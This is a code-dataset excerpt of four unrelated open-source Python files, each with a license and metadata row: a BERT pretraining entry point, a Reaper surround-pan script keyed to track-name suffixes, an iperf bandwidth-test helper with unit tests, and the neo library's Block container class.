raise ValueError('Distribution strategy is not specified.')
# Runs customized training loop.
logging.info('Training using customized training loop TF 2.0 with distributed '
'strategy.')
performance.set_mixed_precision_policy(common_flags.dtype())
return run_customized_training(
strategy,
bert_config,
FLAGS.init_checkpoint, # Used to initialize only the BERT submodel.
FLAGS.max_seq_length,
FLAGS.max_predictions_per_seq,
FLAGS.model_dir,
FLAGS.num_steps_per_epoch,
FLAGS.steps_per_loop,
FLAGS.num_train_epochs,
FLAGS.learning_rate,
FLAGS.warmup_steps,
FLAGS.end_lr,
FLAGS.optimizer_type,
FLAGS.input_files,
FLAGS.train_batch_size,
FLAGS.use_next_sentence_label,
FLAGS.train_summary_interval,
custom_callbacks=custom_callbacks)
def main(_):
gin.parse_config_files_and_bindings(FLAGS.gin_file, FLAGS.gin_param)
if not FLAGS.model_dir:
FLAGS.model_dir = '/tmp/bert20/'
strategy = distribution_utils.get_distribution_strategy(
distribution_strategy=FLAGS.distribution_strategy,
num_gpus=FLAGS.num_gpus,
tpu_address=FLAGS.tpu)
if strategy:
print('***** Number of cores used : ', strategy.num_replicas_in_sync)
run_bert_pretrain(strategy)
if __name__ == '__main__':
app.run(main)
| apache-2.0 | -6,846,756,583,402,169,000 | 36.467005 | 80 | 0.637583 | false |
junh1024/Reaper-Surround | Scripts/SetPanAccordingToName.py | 1 | 1858 | #Some Codes from "Rename tracks to take source filename", -- Set pan for selected track(s) (SPK77)
#This script by junh1024 sets pans of tracks according to their suffixes. Useful for say, film dialogue. See global variables below for pans.
from reaper_python import *
from contextlib import contextmanager
# import os
@contextmanager
def undoable(message):
RPR_Undo_BeginBlock2(0)
try:
yield
finally:
RPR_Undo_EndBlock2(0, message, -1)
debug = True #disable for using
def msg(m):
if 'debug' in globals():
RPR_ShowConsoleMsg(m)
#Track suffixes
L=-0.15 #initial Left pan, everything else is derived modularly. Change to taste.
R=-L
LW=2*L
RW=-LW
LC=(2*L)/3
RC=-LC
#these have parenting set later on
SL=-1
SR=-SL
RR=C=0 #last 2 of naRR,center pans
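#Worked example for reference: with the default L=-0.15 above, these evaluate to
#R=0.15, LW=-0.3, RW=0.3, LC=-0.1, RC=0.1, SL=-1, SR=1, RR=C=0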
# msg(L)
# msg(R)
# msg(LW)
# msg(RW)
# msg(LC)
# msg(RC)
with undoable("Set Pan According To Track Suffix"):
# for i in range(RPR_CountTracks(0)): #for all tracks, get track
# trackId = RPR_GetTrack(0, i)
for i in range(RPR_CountSelectedTracks(0)): #for selected tracks, get track
trackId = RPR_GetSelectedTrack(0, i)
suffix = str(RPR_GetSetMediaTrackInfo_String(trackId, "P_NAME", "", False )[3] )[-2:].lstrip().upper() #get actual track name, last 2 chars, remove whitespace
if(suffix==''):
continue
if(suffix[0] == 'S'): #anything rear/surround. I'm not doing else cuz there may be top pans.
RPR_SetMediaTrackInfo_Value(trackId, "C_MAINSEND_OFFS", 4) #set parent ch 5/6 rear/surround
if(suffix in globals()): #if a suffix is one of the global preset pans, see global variables above
RPR_SetMediaTrackInfo_Value(trackId, "D_PAN", eval(suffix)) #set it according to the pan designated by the suffix REFLECTION USED
if(suffix in ('C,RR,L,R,LW,RW,LC,RC'.split(','))): #anything front
RPR_SetMediaTrackInfo_Value(trackId, "C_MAINSEND_OFFS", 0)
| gpl-3.0 | 5,251,573,571,839,216,000 | 27.584615 | 161 | 0.705597 | false |
yassen-itlabs/py-linux-traffic-control | tests/util/iperf_proc.py | 1 | 7324 | """
Iperf network performance testing module.
Used by tests for simple bandwidth measurements; uses iperf.
"""
import time
from pyltc.util.cmdline import CommandLine
# FIXME: Do we need these? Remove if not.
OUTPUT_REGEXP = r'^\[.*?\]\s+\d+\.\d+\-\d+\.\d+\s+sec\s+\d[\.\d]+\s+\w+\s+(\d+)\s+bits/sec.*$'
TIMEOUT = 60
class Iperf3Server(object):
"""Used for running iperf server component
iperf3 -s 127.0.0.1 -p 5005 -1 -i 0 -f b
iperf -[u]s -B 127.0.0.1 -p 9003 -f b"""
def __init__(self, iperf_bin='iperf', host='127.0.0.1', port=5001):
self._iperf_bin = iperf_bin
self._host = host
self._port = port
self.cmd = None
self.thread = None
def run(self, protocol):
cmd_tmpl = "{} -s -B {} -p {} -f b -y C" if protocol == 'tcp' else "{} -us -B {} -p {} -f b -y C"
cmd_text = cmd_tmpl.format(self._iperf_bin, self._host, self._port)
print('cmd_text(server): {!r}'.format(cmd_text))
self.cmd = CommandLine(cmd_text)
self.cmd.execute_daemon()
return self.cmd
def join(self): # TODO: Perhaps not used anymore?
self.thread.join()
class Iperf3Client(object):
"""Parent of TCPClient and UDPClient"""
def __init__(self, iperf_bin='iperf', host='127.0.0.1', port=5001, duration=4):
self._iperf_bin = iperf_bin
self._host = host
self._port = port
self._duration = duration
class TCPClient(Iperf3Client):
"""Used for running iperf client component in TCP mode.
iperf3 -s 127.0.0.1 -p 5005 -1 -i 0 -f b
iperf -[u]s -B 127.0.0.1 -p 9003 -f b"""
def __init__(self, iperf_bin='iperf', host='127.0.0.1', port=5001, duration=4):
super(TCPClient, self).__init__(iperf_bin=iperf_bin, host=host, port=port, duration=duration)
def run(self):
cmd_text = "{} -c {} -p {} -t {} -f b".format(self._iperf_bin, self._host, self._port, self._duration)
print('cmd_text(tcpclient): {!r}'.format(cmd_text))
self.cmd = CommandLine(cmd_text).execute_daemon()
return self.cmd
class UDPClient(Iperf3Client):
"""Used for running iperf client component in TCP mode.
iperf3 -s 127.0.0.1 -p 5005 -1 -i 0 -f b
iperf -[u]s -B 127.0.0.1 -p 9003 -f b"""
def __init__(self, sendrate, iperf_bin='iperf', host='127.0.0.1', port=5001, duration=4):
super(UDPClient, self).__init__(iperf_bin=iperf_bin, host=host, port=port, duration=duration)
self._sendrate = sendrate
def run(self):
cmd_text = "{} -uc {} -p {} -t {} -f b -b {}".format(self._iperf_bin, self._host, self._port, self._duration, self._sendrate)
print('cmd_text(udpclient): {!r}'.format(cmd_text))
self.cmd = CommandLine(cmd_text).execute_daemon()
return self.cmd
class NetPerfTest(object):
"""Parent of TCPNetPerfTest and UDPNetPerfTest,
which wrap the iperf server-client functionality."""
def __init__(self, sendrate, iperf_bin='iperf', host='127.0.0.1', port=5001, duration=4):
self._sendrate = sendrate
self._iperf_bin = iperf_bin
self._ip = host
self._port = port
self._duration = duration
def _gather_server_output(self, server_cmd, client_cmd):
output_line = None
with server_cmd._proc.stdout:
for line in iter(server_cmd._proc.stdout.readline, b''):
if line:
output_line = line
rc = server_cmd.terminate()
if rc != None:
break
print('Unexpected None returncode after kill()!..')
server_cmd._proc.stderr.close()
client_cmd._proc.stdout.close()
client_cmd._proc.stderr.close()
assert output_line, 'No output from iperf server! cmdline: {}'.format(server_cmd.cmdline)
return output_line
def run(self):
raise NotImplementedError('Abstract method.')
class TCPNetPerfTest(NetPerfTest):
"""Wraps the iperf server-client functionallity for tcp."""
def __init__(self, sendrate, iperf_bin='iperf', host='127.0.0.1', port=5001, duration=4):
"""``sendrate`` is only a dummy argument here, to conform to NetPerfTest interface."""
super(TCPNetPerfTest, self).__init__('dummy', iperf_bin=iperf_bin, host=host, port=port, duration=duration)
def run(self):
server = Iperf3Server(iperf_bin=self._iperf_bin, host=self._ip, port=self._port)
server_cmd = server.run("tcp")
time.sleep(0.1)
client = TCPClient(iperf_bin=self._iperf_bin, host=self._ip, port=self._port, duration=self._duration)
client_cmd = client.run()
output_line = self._gather_server_output(server_cmd, client_cmd)
return int(output_line.split(b',')[8])
class UDPNetPerfTest(NetPerfTest):
"""Wraps the iperf server-client functionallity for udp."""
def __init__(self, sendrate, iperf_bin='iperf', host='127.0.0.1', port=5001, duration=4):
super(UDPNetPerfTest, self).__init__(sendrate, iperf_bin=iperf_bin, host=host, port=port, duration=duration)
def run(self):
server = Iperf3Server(iperf_bin=self._iperf_bin, host=self._ip, port=self._port)
server_cmd = server.run("udp")
time.sleep(0.1)
client = UDPClient(self._sendrate, iperf_bin=self._iperf_bin, host=self._ip, port=self._port, duration=self._duration)
client_cmd = client.run()
output_line = self._gather_server_output(server_cmd, client_cmd)
return int(output_line.split(b',')[8])
#________________________________________
# Test Section Below TODO: Make sure these are also executed on each build
import unittest
class ServerClientTest(unittest.TestCase):
def test_creation(self):
Iperf3Server(iperf_bin='iperf_bin3', host='127.0.0.3', port=30300)
TCPClient(iperf_bin='iperf_bin4', host='127.0.0.4', port=40400, duration=44)
UDPClient('10mbit', iperf_bin='iperf_bin5', host='127.0.0.5', port=50500, duration=55)
@unittest.skip("sould be removed/reworked") # TODO: rework or remove
def test_simple(self): # seems unusable at this point
server = Iperf3Server(iperf_bin='iperf', host='127.0.0.1', port=40400)
server.run("tcp")
time.sleep(0.1)
client = TCPClient(iperf_bin='iperf', host='127.0.0.1', port=40400, duration=4)
client.run()
server.join()
bandwidth = server.get_bandwidth()
print(bandwidth)
class TestNetPerfTest(unittest.TestCase):
def test_creation(self):
TCPNetPerfTest('dummy', iperf_bin='iperf_bin7', host='127.0.0.7', port=7700, duration=77)
UDPNetPerfTest('8mbit', iperf_bin='iperf_bin8', host='127.0.0.8', port=8800, duration=88)
def test_tcp(self):
tcp_netperf = TCPNetPerfTest('dummy', host='127.0.0.1', port=18003, duration=3)
bandwidth = tcp_netperf.run()
print(bandwidth)
def test_tcp_2(self):
tcp_netperf = TCPNetPerfTest('dummy', host='127.0.0.1', port=8003, duration=3)
bandwidth = tcp_netperf.run()
print(bandwidth)
def test_udp(self):
udp_netperf = UDPNetPerfTest('10mbit', host='127.0.0.1', port=17007, duration=3)
bandwidth = udp_netperf.run()
print(bandwidth)
if __name__ == '__main__':
unittest.main()
| mit | -6,457,629,180,857,245,000 | 36.177665 | 133 | 0.608957 | false |
rgerkin/python-neo | neo/core/block.py | 1 | 5206 | # -*- coding: utf-8 -*-
'''
This module defines :class:`Block`, the main container gathering all the data,
whether discrete or continuous, for a given recording session. It is the
top-level container class of the :module:`neo.core` hierarchy.
:class:`Block` derives from :class:`Container`,
from :module:`neo.core.container`.
'''
# needed for python 3 compatibility
from __future__ import absolute_import, division, print_function
from datetime import datetime
from neo.core.container import Container, unique_objs
class Block(Container):
'''
Main container gathering all the data, whether discrete or continuous, for a
given recording session.
A block is not necessarily temporally homogeneous, in contrast to :class:`Segment`.
*Usage*::
>>> from neo.core import (Block, Segment, ChannelIndex,
... AnalogSignal)
>>> from quantities import nA, kHz
>>> import numpy as np
>>>
>>> # create a Block with 3 Segment and 2 ChannelIndex objects
... blk = Block()
>>> for ind in range(3):
... seg = Segment(name='segment %d' % ind, index=ind)
... blk.segments.append(seg)
...
>>> for ind in range(2):
... chx = ChannelIndex(name='Array probe %d' % ind,
... index=np.arange(64))
... blk.channel_indexes.append(chx)
...
>>> # Populate the Block with AnalogSignal objects
... for seg in blk.segments:
... for chx in blk.channel_indexes:
... a = AnalogSignal(np.random.randn(10000, 64)*nA,
... sampling_rate=10*kHz)
... chx.analogsignals.append(a)
... seg.analogsignals.append(a)
*Required attributes/properties*:
None
*Recommended attributes/properties*:
:name: (str) A label for the dataset.
:description: (str) Text description.
:file_origin: (str) Filesystem path or URL of the original data file.
:file_datetime: (datetime) The creation date and time of the original
data file.
:rec_datetime: (datetime) The date and time of the original recording.
*Properties available on this object*:
:list_units: descends through hierarchy and returns a list of
:class:`Unit` objects existing in the block. This shortcut exists
because a common analysis case is analyzing all neurons that
you recorded in a session.
Note: Any other additional arguments are assumed to be user-specific
metadata and stored in :attr:`annotations`.
*Container of*:
:class:`Segment`
:class:`ChannelIndex`
'''
_container_child_objects = ('Segment', 'ChannelIndex')
_child_properties = ('Unit',)
_recommended_attrs = ((('file_datetime', datetime),
('rec_datetime', datetime),
('index', int)) +
Container._recommended_attrs)
_repr_pretty_attrs_keys_ = (Container._repr_pretty_attrs_keys_ +
('file_origin', 'file_datetime',
'rec_datetime', 'index'))
_repr_pretty_containers = ('segments',)
def __init__(self, name=None, description=None, file_origin=None,
file_datetime=None, rec_datetime=None, index=None,
**annotations):
'''
Initialize a new :class:`Block` instance.
'''
super(Block, self).__init__(name=name, description=description,
file_origin=file_origin, **annotations)
self.file_datetime = file_datetime
self.rec_datetime = rec_datetime
self.index = index
self.regionsofinterest = [] # temporary workaround.
# the goal is to store all sub-classes of RegionOfInterest in a single list
# but this will need substantial changes to container handling
@property
def data_children_recur(self):
'''
All data child objects stored in the current object,
obtained recursively.
'''
# subclassing this to remove duplicate objects such as SpikeTrain
# objects in both Segment and Unit
# Only Block can have duplicate items right now, so implement
# this here for performance reasons.
return tuple(unique_objs(super(Block, self).data_children_recur))
def list_children_by_class(self, cls):
'''
List all children of a particular class recursively.
You can either provide a class object, a class name,
or the name of the container storing the class.
'''
# subclassing this to remove duplicate objects such as SpikeTrain
# objects in both Segment and Unit
# Only Block can have duplicate items right now, so implement
# this here for performance reasons.
return unique_objs(super(Block, self).list_children_by_class(cls))
@property
def list_units(self):
'''
Return a list of all :class:`Unit` objects in the :class:`Block`.
'''
return self.list_children_by_class('unit')
| bsd-3-clause | -1,240,157,085,246,349,600 | 37.562963 | 87 | 0.599116 | false |